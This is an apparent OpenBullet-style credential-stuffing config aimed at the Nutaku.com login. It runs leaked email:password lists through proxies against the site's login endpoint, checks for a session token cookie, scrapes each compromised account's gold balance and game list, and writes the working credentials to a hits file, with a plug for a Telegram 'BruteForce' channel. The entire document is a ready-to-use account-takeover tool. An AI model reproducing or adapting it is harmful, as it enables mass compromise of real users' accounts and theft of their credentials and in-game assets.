[SETTINGS]
{
  "Name": "Nutaku.com",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2020-06-15T22:57:15.7945938+02:00",
  "AdditionalInfo": "Save Hit | Capture | Fast",
  "Author": "@H0S31N",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Lenght FUNCTION Length "mailAddress=<USER>&password=<PASS>&autoLogin=true&gRecaptchaResponse=" -> VAR "Lenght" 

#Post REQUEST POST "https://www.nutaku.com/login/index/ajax" 
  CONTENT "mailAddress=<USER>&password=<PASS>&autoLogin=true&gRecaptchaResponse=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: fa,en-US;q=0.9,en;q=0.8" 
  HEADER "content-length: <Lenght>" 
  HEADER "origin: https://www.nutaku.com" 
  HEADER "referer: https://www.nutaku.com/" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 
  HEADER "x-requested-with: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<COOKIES>" Contains "Nutaku_TOKEN" 
  KEYCHAIN Failure OR 
    KEY "{\"errorMessage\":\"\",\"errorType\":\"unknown\",\"captchaTries\":" 

#GetGame REQUEST GET "https://www.nutaku.net/members/profile/mygames/browser/" 
  
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: fa,en-US;q=0.9,en;q=0.8" 
  HEADER "cache-control: max-age=0" 
  HEADER "referer: https://www.nutaku.net/members/profile/" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 

#GOLD PARSE "<SOURCE>" LR "gold\" class=\"gold-count\"><span class=\"gold-icon\"></span><span>" "</span></a>" CreateEmpty=FALSE -> CAP "GOLD" 

#GG1 PARSE "<SOURCE>" LR "played browser games" "<section class=\"footer-links\">" -> VAR "GG1" 

#GG2 PARSE "<GG1>" LR "<h3>" "</h3>" Recursive=TRUE -> VAR "GG2" 

#Games_List FUNCTION Replace "," " / " "<GG2>" -> CAP "Games List" 

#GG4 FUNCTION Replace " / " "\\n" "<Games List>" -> VAR "GG4" 

#CC FUNCTION Constant "Telegram Channel: @BruteForce" -> CAP "CC" 

#S UTILITY File "Nutaku.txt" AppendLines "<<<<Account>>>>\\nUser: <USER>\\nPass: <PASS>\\n<<<<Capture>>>>\\nGold: <GOLD>\\nGames List:\\n<GG4>\\n{{{{<CC>}}}}\\n==============================" -> VAR "S" 

